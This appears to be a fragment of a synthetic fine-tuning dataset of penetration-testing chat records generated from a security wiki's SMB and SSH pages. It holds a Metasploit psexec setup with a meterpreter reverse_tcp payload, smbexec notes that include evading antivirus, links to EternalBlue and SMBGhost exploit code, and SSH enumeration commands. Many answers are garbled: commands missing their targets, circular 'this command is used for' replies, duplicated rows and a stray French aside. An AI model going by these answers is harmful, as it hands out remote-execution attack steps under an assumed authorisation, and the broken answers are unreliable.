the output of the command via Smb and displays the content. For every command, a new service is created.\n\nhttps://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n\n> [!TIP]\n> %COMSPEC% is the environment variable that generaly points to the command line interpreter. (_cmd.exe, powershell.exe_...)\n\n> [!TIP]\n> The purpose of using /Q option of cmd is to stop displaying output. (je crois que ça veut dire /quiet à vérifier)\n\n> [!CAUTION]\n> Prioritize using Smbexec when you detect a strong AV, cmd.exe`is a trusted component of the operating system.\n\n> [!CAUTION]\n> Privileged user credentials required.\n\nWindows Management Instrumentation is a subsystem of PowerShell that gives high privileged "}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ SMB - 🛠️ Authenticated RCE", "response": "PSExec exploit module runs on the same principle as the PSExec Windows utility. The exploit embeds a payload into an executable, upload it into the Admin$ share. It then calls the Service Control Manager to approximately start a new rundll32.exe process that will execute our malicious executable.\n\n``\nmsf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as\n`\n\n> [!CAUTION]\n> Privileged user credentials required.\n\n> [!CAUTION]\n> File uploading, creating, starting, stopping, deletion of services makes it really noisy.\n\nSmbexec works like Psexec, but instead of trying to execute an uploaded executable inside the share, it will try to use directly the binaries _cmd.exe/powershell.exe_. The exploit create an arbitrary service with the _Service File Name_ attribute set to a command string to execute. It echoes the command to be executed to a .bat file, execute it and delete it.\n\nThe exploit then get the output of the command via Smb and displays the content. For every command, a new service is created.\n\nhttps://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n\n> [!TIP]\n> %COMSPEC% is the environment variable that generaly points to the command line interpreter. (_cmd.exe, powershell.exe_...)\n\n> [!TIP]\n> The purpose of using /Q option of cmd is to stop displaying output. (je crois que ça veut dire /quiet à vérifier)\n\n> [!CAUTION]\n> Prioritize using Smbexec when you detect a strong AV, cmd.exe`is a trusted component of the operating system.\n\n> [!CAUTION]\n> Privileged user credentials required.\n\nWindows Management Instrumentation is a subsystem of PowerShell that gives high privileged ", "metadata": {"corpus_index": 1525, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the msf syntax for 🛠️ smb - 🛠️ authenticated rce?"}, {"role": "assistant", "content": "msf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the msf syntax for 🛠️ smb - 🛠️ authenticated rce?", "response": "msf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as", "metadata": {"corpus_index": 1526, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "msf"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ SMB - 🛠️ Authenticated RCE"}, {"role": "assistant", "content": "msf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ SMB - 🛠️ Authenticated RCE", "response": "msf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as", "metadata": {"corpus_index": 1526, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `msf > use exploit/windows/smb/psexec`?"}, {"role": "assistant", "content": "This command is used for 🛠️ smb - 🛠️ authenticated rce. 🛠️ Authenticated RCE"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `msf > use exploit/windows/smb/psexec`?", "response": "This command is used for 🛠️ smb - 🛠️ authenticated rce. 🛠️ Authenticated RCE", "metadata": {"corpus_index": 1526, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ SMB - 🛠️ Unauthenticated RCE?"}, {"role": "assistant", "content": "Eternalblue is a flaw that allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server. Other related exploits were labelled asEternalchampion, Eternalromance and Eternalsynergy.\n\nhttps://github.com/worawit/MS17-010\n\nSmbghost is a bug occuring in the decompression mechanism of client message to a SMBv3.11 server. This bug leads remotely and without any authentication to a BSOD or an RCE on the target.\n\nhttps://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/\n\nhttps://github.com/ZecOps/CVE-2020-0796-RCE-POC\n\nSmbleed allows to leak kernel memory remotely, it is also occuring in the same decompression mechanism as smbghost.\n\nIn order for the target to be vulnerable, it must have the SMBv3.1.1 implementation running and the compression function enabled, which is on by default.\n\nhttps://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/\n\nhttps://github.com/ZecOps/CVE-2020-1206-POC"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ SMB - 🛠️ Unauthenticated RCE?", "response": "Eternalblue is a flaw that allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server. Other related exploits were labelled asEternalchampion, Eternalromance and Eternalsynergy.\n\nhttps://github.com/worawit/MS17-010\n\nSmbghost is a bug occuring in the decompression mechanism of client message to a SMBv3.11 server. This bug leads remotely and without any authentication to a BSOD or an RCE on the target.\n\nhttps://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/\n\nhttps://github.com/ZecOps/CVE-2020-0796-RCE-POC\n\nSmbleed allows to leak kernel memory remotely, it is also occuring in the same decompression mechanism as smbghost.\n\nIn order for the target to be vulnerable, it must have the SMBv3.1.1 implementation running and the compression function enabled, which is on by default.\n\nhttps://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/\n\nhttps://github.com/ZecOps/CVE-2020-1206-POC", "metadata": {"corpus_index": 1527, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ SMB - 🛠️ Unauthenticated RCE?"}, {"role": "assistant", "content": "Eternalblue is a flaw that allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server. Other related exploits were labelled asEternalchampion, Eternalromance and Eternalsynergy.\n\nhttps://github.com/worawit/MS17-010\n\nSmbghost is a bug occuring in the decompression mechanism of client message to a SMBv3.11 server. This bug leads remotely and without any authentication to a BSOD or an RCE on the target.\n\nhttps://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/\n\nhttps://github.com/ZecOps/CVE-2020-0796-RCE-POC\n\nSmbleed allows to leak kernel memory remotely, it is also occuring in the same decompression mechanism as smbghost.\n\nIn order for the target to be vulnerable, it must have the SMBv3.1.1 implementation running and the compression function enabled, which is on by default.\n\nhttps://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/\n\nhttps://github.com/ZecOps/CVE-2020-1206-POC"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ SMB - 🛠️ Unauthenticated RCE?", "response": "Eternalblue is a flaw that allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server. Other related exploits were labelled asEternalchampion, Eternalromance and Eternalsynergy.\n\nhttps://github.com/worawit/MS17-010\n\nSmbghost is a bug occuring in the decompression mechanism of client message to a SMBv3.11 server. This bug leads remotely and without any authentication to a BSOD or an RCE on the target.\n\nhttps://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/\n\nhttps://github.com/ZecOps/CVE-2020-0796-RCE-POC\n\nSmbleed allows to leak kernel memory remotely, it is also occuring in the same decompression mechanism as smbghost.\n\nIn order for the target to be vulnerable, it must have the SMBv3.1.1 implementation running and the compression function enabled, which is on by default.\n\nhttps://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/\n\nhttps://github.com/ZecOps/CVE-2020-1206-POC", "metadata": {"corpus_index": 1527, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ SSH - Theory"}, {"role": "assistant", "content": "The SSH protocol (Secure Shell) is used to login from one machine to another securely. It offers several options for strong authentication, as it protects the connections and communications security and integrity with strong encryption. This connection can be used for terminal access, file transfers, and for tunneling other applications."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ SSH - Theory", "response": "The SSH protocol (Secure Shell) is used to login from one machine to another securely. It offers several options for strong authentication, as it protects the connections and communications security and integrity with strong encryption. This connection can be used for terminal access, file transfers, and for tunneling other applications.", "metadata": {"corpus_index": 1528, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ SSH - Theory during a pentest?"}, {"role": "assistant", "content": "The SSH protocol (Secure Shell) is used to login from one machine to another securely. It offers several options for strong authentication, as it protects the connections and communications security and integrity with strong encryption. This connection can be used for terminal access, file transfers, and for tunneling other applications."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ SSH - Theory during a pentest?", "response": "The SSH protocol (Secure Shell) is used to login from one machine to another securely. It offers several options for strong authentication, as it protects the connections and communications security and integrity with strong encryption. This connection can be used for terminal access, file transfers, and for tunneling other applications.", "metadata": {"corpus_index": 1528, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ SSH - Authentication type?"}, {"role": "assistant", "content": "It is possible to enumerate the allowed authentication types with the following command:\n\n``bash\nssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ SSH - Authentication type?", "response": "It is possible to enumerate the allowed authentication types with the following command:\n\n``bash\nssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive\n``", "metadata": {"corpus_index": 1529, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ SSH - Authentication type?"}, {"role": "assistant", "content": "It is possible to enumerate the allowed authentication types with the following command:\n\n``bash\nssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ SSH - Authentication type?", "response": "It is possible to enumerate the allowed authentication types with the following command:\n\n``bash\nssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive\n``", "metadata": {"corpus_index": 1529, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ssh command to 🛠️ ssh - authentication type"}, {"role": "assistant", "content": "ssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ssh command to 🛠️ ssh - authentication type", "response": "ssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive", "metadata": {"corpus_index": 1530, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ssh"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ SSH - Authentication type"}, {"role": "assistant", "content": "ssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ SSH - Authentication type", "response": "ssh -v \nOpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019\n...\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive", "metadata": {"corpus_index": 1530, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ssh -v`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - authentication type. Authentication type"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ssh -v`?", "response": "This command is used for 🛠️ ssh - authentication type. Authentication type", "metadata": {"corpus_index": 1530, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ SSH - Banner Grabbing in the context of penetration testing"}, {"role": "assistant", "content": "Useful to get basic information about the SSH server such as its type and version.\n\n``bash\nnc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ SSH - Banner Grabbing in the context of penetration testing", "response": "Useful to get basic information about the SSH server such as its type and version.\n\n``bash\nnc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\n``", "metadata": {"corpus_index": 1531, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ SSH - Banner Grabbing?"}, {"role": "assistant", "content": "Useful to get basic information about the SSH server such as its type and version.\n\n``bash\nnc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ SSH - Banner Grabbing?", "response": "Useful to get basic information about the SSH server such as its type and version.\n\n``bash\nnc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\n``", "metadata": {"corpus_index": 1531, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the nc syntax for 🛠️ ssh - banner grabbing?"}, {"role": "assistant", "content": "nc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the nc syntax for 🛠️ ssh - banner grabbing?", "response": "nc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7", "metadata": {"corpus_index": 1532, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nc"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ SSH - Banner Grabbing?"}, {"role": "assistant", "content": "nc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ SSH - Banner Grabbing?", "response": "nc -vn 22\n...\nSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7", "metadata": {"corpus_index": 1532, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nc -vn 22`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - banner grabbing. Banner Grabbing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nc -vn 22`?", "response": "This command is used for 🛠️ ssh - banner grabbing. Banner Grabbing", "metadata": {"corpus_index": 1532, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ssh-keyscan command to 🛠️ ssh - server's public ssh key"}, {"role": "assistant", "content": "ssh-keyscan -t rsa -p"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ssh-keyscan command to 🛠️ ssh - server's public ssh key", "response": "ssh-keyscan -t rsa -p", "metadata": {"corpus_index": 1533, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ssh-keyscan"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ SSH - Server's public SSH key"}, {"role": "assistant", "content": "ssh-keyscan -t rsa -p"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ SSH - Server's public SSH key", "response": "ssh-keyscan -t rsa -p", "metadata": {"corpus_index": 1533, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ssh-keyscan -t rsa -p`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - server's public ssh key. Server's public SSH key"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ssh-keyscan -t rsa -p`?", "response": "This command is used for 🛠️ ssh - server's public ssh key. Server's public SSH key", "metadata": {"corpus_index": 1533, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ SSH - Weak Cipher Algorithms work?"}, {"role": "assistant", "content": "Some auditing tools can help to quikly find the target version and which algorithms are available on the server in order to give recommendations to the customer.\n\n::: tabs\n\n=== sslscan\n\n``bash\nsslscan :22\n`\n\n=== nmap\n\n`bash\nnmap -p22 -n -sV --script ssh2-enum-algos \n`\n\n=== ssh-audit\n\n`bash\nssh-audit -p 22 -4 \n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ SSH - Weak Cipher Algorithms work?", "response": "Some auditing tools can help to quikly find the target version and which algorithms are available on the server in order to give recommendations to the customer.\n\n::: tabs\n\n=== sslscan\n\n``bash\nsslscan :22\n`\n\n=== nmap\n\n`bash\nnmap -p22 -n -sV --script ssh2-enum-algos \n`\n\n=== ssh-audit\n\n`bash\nssh-audit -p 22 -4 \n``\n\n:::", "metadata": {"corpus_index": 1534, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ SSH - Weak Cipher Algorithms"}, {"role": "assistant", "content": "Some auditing tools can help to quikly find the target version and which algorithms are available on the server in order to give recommendations to the customer.\n\n::: tabs\n\n=== sslscan\n\n``bash\nsslscan :22\n`\n\n=== nmap\n\n`bash\nnmap -p22 -n -sV --script ssh2-enum-algos \n`\n\n=== ssh-audit\n\n`bash\nssh-audit -p 22 -4 \n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ SSH - Weak Cipher Algorithms", "response": "Some auditing tools can help to quikly find the target version and which algorithms are available on the server in order to give recommendations to the customer.\n\n::: tabs\n\n=== sslscan\n\n``bash\nsslscan :22\n`\n\n=== nmap\n\n`bash\nnmap -p22 -n -sV --script ssh2-enum-algos \n`\n\n=== ssh-audit\n\n`bash\nssh-audit -p 22 -4 \n``\n\n:::", "metadata": {"corpus_index": 1534, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the sslscan command to 🛠️ ssh - weak cipher algorithms"}, {"role": "assistant", "content": "sslscan :22"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the sslscan command to 🛠️ ssh - weak cipher algorithms", "response": "sslscan :22", "metadata": {"corpus_index": 1535, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sslscan"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ SSH - Weak Cipher Algorithms"}, {"role": "assistant", "content": "sslscan :22"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ SSH - Weak Cipher Algorithms", "response": "sslscan :22", "metadata": {"corpus_index": 1535, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sslscan :22`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - 